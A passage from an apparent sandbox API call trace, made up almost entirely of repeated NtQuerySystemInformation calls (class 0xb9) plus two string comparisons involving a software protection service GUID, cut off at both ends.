NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.793] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.794] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb30, Length=0x28, ResultLength=0x0) [0293.799] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x20, ResultLength=0x0) [0293.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0293.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.800] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0293.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.801] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee70, Length=0x50, ResultLength=0x0) [0293.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed60, Length=0x50, ResultLength=0x0) [0293.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eac0, Length=0x28, ResultLength=0x0) [0293.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb30, Length=0x28, ResultLength=0x0) [0293.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec90, Length=0x38, ResultLength=0x0) [0293.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eb10, Length=0x20, ResultLength=0x0) [0293.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0293.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eaa0, Length=0x20, ResultLength=0x0) [0293.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0293.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0293.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0293.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0293.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0294.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0294.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea30, Length=0x50, ResultLength=0x0) [0294.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea30, Length=0x50, ResultLength=0x0) [0294.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea30, Length=0x50, ResultLength=0x0) [0294.024] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0294.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0294.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0294.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.025] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e920, Length=0x50, ResultLength=0x0) [0294.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e850, Length=0x38, ResultLength=0x0) [0294.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x28, ResultLength=0x0) [0294.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x28, ResultLength=0x0) [0294.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e680, Length=0x28, ResultLength=0x0) [0294.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6f0, Length=0x28, ResultLength=0x0) [0294.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e850, Length=0x38, ResultLength=0x0) [0294.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e850, Length=0x38, ResultLength=0x0) [0294.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e6d0, Length=0x20, ResultLength=0x0) [0294.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e660, Length=0x20, ResultLength=0x0) [0294.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e660, Length=0x20, ResultLength=0x0) [0294.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.032] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0294.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0294.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea60, Length=0x28, ResultLength=0x0) [0294.033] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0294.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.036] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e8b0, Length=0x28, ResultLength=0x0) [0294.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0294.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e930, Length=0x28, ResultLength=0x0) [0294.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e7d0, Length=0x20, ResultLength=0x0) [0294.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e750, Length=0x20, ResultLength=0x0) [0294.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.042] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e890, Length=0x20, ResultLength=0x0) [0294.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0294.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e820, Length=0x20, ResultLength=0x0) [0294.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eee0, Length=0x40, ResultLength=0x0) [0294.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ee00, Length=0x30, ResultLength=0x0) [0294.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ed08, Length=0x30, ResultLength=0x0) [0294.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ec70, Length=0x38, ResultLength=0x0) [0294.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea60, Length=0x28, ResultLength=0x0) [0294.048] _wcsicmp (_String1="SPPSVC\\0ff1ce15-a989-479d-af46-f275c6370663", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0294.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217eae0, Length=0x50, ResultLength=0x0) [0294.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217ea10, Length=0x38, ResultLength=0x0) [0294.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0294.051] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78217e840, Length=0x28, ResultLength=0x0) [0294.052] NtQuerySystemInformation 